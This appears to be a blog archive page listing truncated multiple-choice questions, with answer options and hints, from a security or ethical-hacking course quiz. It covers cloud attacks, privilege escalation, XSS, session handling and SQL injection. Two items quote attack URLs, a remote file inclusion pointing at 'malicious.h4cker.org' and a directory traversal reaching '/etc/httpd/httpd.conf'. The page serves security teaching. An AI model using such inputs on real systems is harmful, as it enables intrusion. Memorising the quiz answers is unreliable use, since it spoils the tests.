Which cloud technology attack method would require the threat actor to create a malicious application and install it into a SaaS, PaaS, or IaaS environment?

  • Post author:
  • Post category:Blog
  • Post comments:0 Comments
  • Post last modified:June 12, 2024
  • Reading time:1 mins read

Which cloud technology attack method would require the threat actor to create a malicious application and install it into a SaaS, PaaS, or IaaS environment? resource exhaustion attack account takeover…


Which cloud technology attack method could generate crafted packets to cause a cloud application to crash?


Which cloud technology attack method could generate crafted packets to cause a cloud application to crash? resource exhaustion attack account takeover metadata service attack side-channel attack Explanation & Hint: Threat…


Which tool could be used to find vulnerabilities that could lead to metadata service attacks?


Which tool could be used to find vulnerabilities that could lead to metadata service attacks? Nimbostratus Clair Falco Dagda Explanation & Hint: Tools such as nimbostratus (https://github.com/andresriancho/nimbostratus) can be used…


Which cloud technology attack method could a threat actor use to access a user or application account that allows access to more accounts and information?


Which cloud technology attack method could a threat actor use to access a user or application account that allows access to more accounts and information? account takeover metadata service attacks…


Which term describes when a lower-privileged user accesses functions reserved for higher-privileged users?


Which term describes when a lower-privileged user accesses functions reserved for higher-privileged users? vertical privilege escalation horizontal privilege escalation credential harvesting metadata service attacks Explanation & Hint: Vertical privilege escalation…


Which cloud technology attack method could exploit a bug in a software application to gain access to resources that normally would not be accessible to a user?


Which cloud technology attack method could exploit a bug in a software application to gain access to resources that normally would not be accessible to a user? account takeover credential…


Which cloud technology attack method involves breaching the infrastructure to gather and steal information such as valid usernames, passwords, tokens, and PINs?


Which cloud technology attack method involves breaching the infrastructure to gather and steal information such as valid usernames, passwords, tokens, and PINs? account takeover credential harvesting privilege escalation side-channel attacks…


Which term is an essential characteristic of cloud computing as defined in NIST SP 800-145?


Which term is an essential characteristic of cloud computing as defined in NIST SP 800-145? centralized storage resource pooling reduced bandwidth requirements slow elasticity Explanation & Hint: NIST SP 800-145…


What is the best practice to mitigate the vulnerabilities from a lack of proper error handling in an application?


What is the best practice to mitigate the vulnerabilities from a lack of proper error handling in an application? Use only a minimum set of error messages.  Use a strong…


Because of an insecure code practice, an attacker can leverage and completely compromise an application or the underlying system. What insecure code practice enabled this catastrophic threat?


Because of an insecure code practice, an attacker can leverage and completely compromise an application or the underlying system. What insecure code practice enabled this catastrophic threat? lack of error…


Which type of vulnerability did the attacker try to exploit?


An attacker enters the following URL to exploit vulnerabilities in a web application: http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html Which type of vulnerability did the attacker try to exploit? directory traversal  cookie manipulation  local file…


Which type of web vulnerability is being exploited by the attacker?


After some reconnaissance efforts, an attacker identified a web server hosted on a Linux system. The attacker then entered the URL shown below, http://192.168.46.82:45/vulnerabilities/fi/?page=../../../../../etc/httpd/httpd.conf Which type of web vulnerability is…


According to OWASP, which three statements are rules to prevent XSS attacks? (Choose three.)


According to OWASP, which three statements are rules to prevent XSS attacks? (Choose three.) Use the HTML <a> tag with JavaScript encoding.  Use HTTPS only mode for accessing web applications. …


Which type of vulnerability does the attacker try to exploit?


An attacker sends a request to an online university portal site with the information: https://portal.a-univ.edu/?search=students&results=50&search=staff Which type of vulnerability does the attacker try to exploit? redirect  session hijacking  default credential …


An organization has developed a network security policy stating that newly purchased routers and switches must be configured with advanced security measures before deploying them to the production network. Which threat does this policy mitigate?


An organization has developed a network security policy stating that newly purchased routers and switches must be configured with advanced security measures before deploying them to the production network. Which…


A web application configures client cookies with the HTTPOnly flag. What is the effect of this flag?


A web application configures client cookies with the HTTPOnly flag. What is the effect of this flag? It informs the web client that the cookie is a persistent cookie.  It…


What is a potentially dangerous web session management practice?


What is a potentially dangerous web session management practice? including the session ID in the URL  setting a cookie with the Expires attribute  setting a cookie with the Max-Age attribute …


A company uses the Microsoft Active Directory service to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type of penetration testing can be used to verify the proper configuration of the Active Directory service?


A company uses the Microsoft Active Directory service to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type…


Which type of SQL query is in the SQL statement select * from users where user = "admin";?


Which type of SQL query is in the SQL statement select * from users where user = "admin";? static query stacked query  out-of-band query  parameterized query  Explanation & Hint: The…


An attacker launches an SQL injection attack on a web application by trying to force the application requesting the back-end database to perform multiple SELECT queries. Which technique exploits the SQL injection vulnerability on the web application?


An attacker launches an SQL injection attack on a web application by trying to force the application requesting the back-end database to perform multiple SELECT queries. Which technique exploits the…
